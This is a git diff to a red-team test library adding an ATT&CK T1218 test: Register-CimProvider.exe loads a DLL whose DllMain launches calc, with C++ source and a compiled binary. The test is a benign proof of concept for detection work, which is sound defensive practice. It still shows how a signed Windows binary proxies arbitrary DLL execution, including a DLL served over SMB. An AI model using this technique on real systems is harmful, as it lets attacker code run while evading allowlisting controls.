diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml
index aba47707..93129931 100644
--- a/atomics/T1218/T1218.yaml
+++ b/atomics/T1218/T1218.yaml
@@ -40,3 +40,20 @@ atomic_tests:
     name: command_prompt
     command: |
       SyncAppvPublishingServer.exe "n; #{powershell_code}"
+
+- name: Register-CimProvider - Execute evil dll 
+  description: |
+    Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    dll_payload:
+      description: DLL to execute
+      type: Path
+      default: C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll
+  executor:
+    name: command_prompt
+    command: |
+     C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} 
diff --git a/atomics/T1218/src/T1218-2.cpp b/atomics/T1218/src/T1218-2.cpp
new file mode 100644
index 00000000..0e65a65f
--- /dev/null
+++ b/atomics/T1218/src/T1218-2.cpp
@@ -0,0 +1,12 @@
+#include <windows.h>
+
+int beerTime()
+{
+ WinExec("calc", SW_SHOWNORMAL);
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
+{
+ beerTime();
+ return 0;
+}
diff --git a/atomics/T1218/src/Win32/T1218-2.dll b/atomics/T1218/src/Win32/T1218-2.dll
new file mode 100644
index 00000000..7334ea8b
Binary files /dev/null and b/atomics/T1218/src/Win32/T1218-2.dll differ